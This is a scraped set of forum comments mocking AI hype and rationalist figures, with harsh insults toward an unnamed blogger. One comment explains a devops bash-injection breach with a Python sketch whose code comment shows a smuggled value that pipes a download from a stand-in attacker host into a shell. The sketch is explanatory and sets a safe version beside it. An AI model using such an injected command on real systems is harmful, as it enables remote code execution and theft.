

It’s not always easy to distinguish between existentialism and a bad mood.
Getting love bombed in that rationalist con he went to recently probably didn’t help matters.
The common clay of the new west:
ChatGPT has become worthless
[Business & Professional]
I’m a paid member and asked it to help me research a topic and write a guide and it said it needed days to complete it. That’s a first. Usually it could do this task on the spot.
It missed the first deadline and missed 5 more. 3 weeks went by and it couldn’t get the task done. Went to Claude and it did it in 10 minutes. No idea what is going on with ChatGpt but I cancelled the pay plan.
Anyone else having this kind of issue?
Shamelessly reproduced from the other place:
A quick summary of his last three posts:
“Here’s a thought experiment I came up with to try to justify the murder of tens of thousands of children.”
“Lots of people got mad at me for my last post; have you considered that being mad at me makes me the victim and you a Nazi?”
“I’m actually winning so much right now: it’s very normal that people keep worriedly speculating that I’ve suffered some sort of mental breakdown.”
I’m even grateful, in a way, to SneerClub, and to Woit and his minions. I’m grateful to them for so dramatically confirming that I’m not delusional: some portion of the world really is out to get me. I probably overestimated their power, but not their malevolence. […]
Honestly, what he should actually be grateful for is that all his notoriety ever amounted to[1] was a couple of obscure forums going ‘look at this dumb asshole’ and moving on.
He is an insecure and toxic serial overreactor with shit opinions and a huge unpopular-young-nerd chip on his shoulder, and who comes off as being one mildly concerted troll effort away from a psych ward at all times. And probably not even that, judging from Graham Linehan’s life trajectory.
[1] besides Siskind using him to broaden his influence on incels and gamer gaters.
It’s like a one-and-a-half-page article that also comes in audio and video form, don’t be lazy.
They vibe-coded a bash injection vulnerability into their devops code, which was used to gain access to the repo and push out a release with malicious code, which in turn prompted any installed LLM wrappers like Cursor to gather anything that looked like a configuration or text file on the infected machine and presumably leak it to the attacker.
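Not the actual code from the incident, but a minimal sketch of the injection class being described, with the devops helper reimagined as a Python script; `tag_release` and the `git` commands are illustrative assumptions:

```python
# Hypothetical illustration of the vulnerability class described above,
# not the code from the incident: a devops helper that splices untrusted
# input (a version string, branch name, PR title...) into a shell command.
import subprocess

def tag_release(version: str) -> None:
    # UNSAFE: `version` is pasted straight into a shell command, so a value
    # like "1.2.3; curl https://attacker.example/x | sh" runs arbitrary
    # commands with the CI job's credentials and repo access.
    subprocess.run(f"git tag v{version} && git push origin v{version}",
                   shell=True, check=True)

def tag_release_safe(version: str) -> None:
    # Safer: pass arguments as a list so nothing goes through the shell.
    subprocess.run(["git", "tag", f"v{version}"], check=True)
    subprocess.run(["git", "push", "origin", f"v{version}"], check=True)
```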
Modern move-money-between-pockets-for-profit economics seems to give The Hitchhiker’s Guide’s bistromathics a run for its money.
I wonder what this means for US GDP
Don’t worry, unchecked inflation and increasing housing costs will keep the GDP propped up at least for a while longer.
He has capital L Lawfulness concerns. About the parent and the child being asymmetrically skilled in context engineering. Which apparently is the main reason kids shouldn’t trust LLM output.
Him showing his ass with the memory comment is just a bonus.
I feel dumber for having read that, and not in the intellectually humbled way.
This hits differently over the recent news that ChatGPT encouraged and aided a teen suicide.
Kelsey Piper xhitted: Never thought I’d become a ‘take your relationship problems to ChatGPT’ person but when the 8yo and I have an argument it actually works really well to mutually agree on an account of events for Claude and then ask for its opinion
I think she considers the AIs far more knowledgeable than me about reasonable human behavior so if I say something that’s no reason to think it’s true but if Claude says it then it at least merits serious consideration
AI innovation in this space usually means automatically adding stuff to the model’s context.
It probably started with the (failed) build output getting added on every iteration, but it’s entirely possible to feed the LLM debugger data from a runtime crash and hope something usable happens.
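I’m guessing at the mechanics, but the loop presumably looks something like this sketch; `call_llm`, the `make build` target, and the whole-file rewrite are assumptions rather than anything from the article:

```python
# Minimal sketch of the "add the failure to the context" loop described above.
import subprocess

def fix_until_build_passes(source_path: str, call_llm, max_attempts: int = 5) -> bool:
    for _ in range(max_attempts):
        build = subprocess.run(["make", "build"], capture_output=True, text=True)
        if build.returncode == 0:
            return True  # build passes, stop iterating
        # The "innovation": stuff the failed build output (or crash/debugger
        # data) into the prompt and hope something usable comes back.
        with open(source_path) as f:
            source = f.read()
        prompt = (
            "The build failed with this output:\n"
            f"{build.stdout}\n{build.stderr}\n"
            f"Current contents of {source_path}:\n{source}\n"
            "Reply with a corrected version of the whole file."
        )
        with open(source_path, "w") as f:
            f.write(call_llm(prompt))
    return False
```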
When I was at computer toucher school at about the start of the century, the things taught under the moniker of AI were (I think) fuzzy logic, incremental optimization and graph algorithms, and neural networks.
AI is a sci-fi trope far more than it ever was a well-defined research topic.
Anyone who said this about their product would almost certainly be lying, but these guys are extra lying.
For sure, a blockchain-based agentic LLM that learns as it goes sounds like someone describing a flying elephant wearing an inflatable life jacket.
Nobody’s using datasets made of copyrighted literature and 4chan to teach robots how to move, what are you even on about.
@dgerard is never going to run out of content for pivot, is he:
“AI is obviously gonna one-shot the human limbic system,” referring to the part of the brain responsible for human emotions. “That said, I predict — counter-intuitively — that it will increase the birth rate!” he continued without explanation. “Mark my words. Also, we’re gonna program it that way.”
Risk checks for financial services: $1M saved annually on outsourced risk management
Since I doubt they had time to use the tools for a full year, this is probably just the one month in which they saved ~$85K by firing (or ending partnerships with) the humans involved in risk assessment, multiplied by twelve.
In the long run I’m betting that exclusively using software that not only can’t do basic math but actually treats numbers as words for risk assessment isn’t going to be a net positive for their bottom line, especially if their customers also get it in their heads that they could ditch the middleman and use a chatbot directly themselves.
This is too corny and overdramatic for my tastes. It reads a bit like satire, complete with piling on the religious undertones there at the end.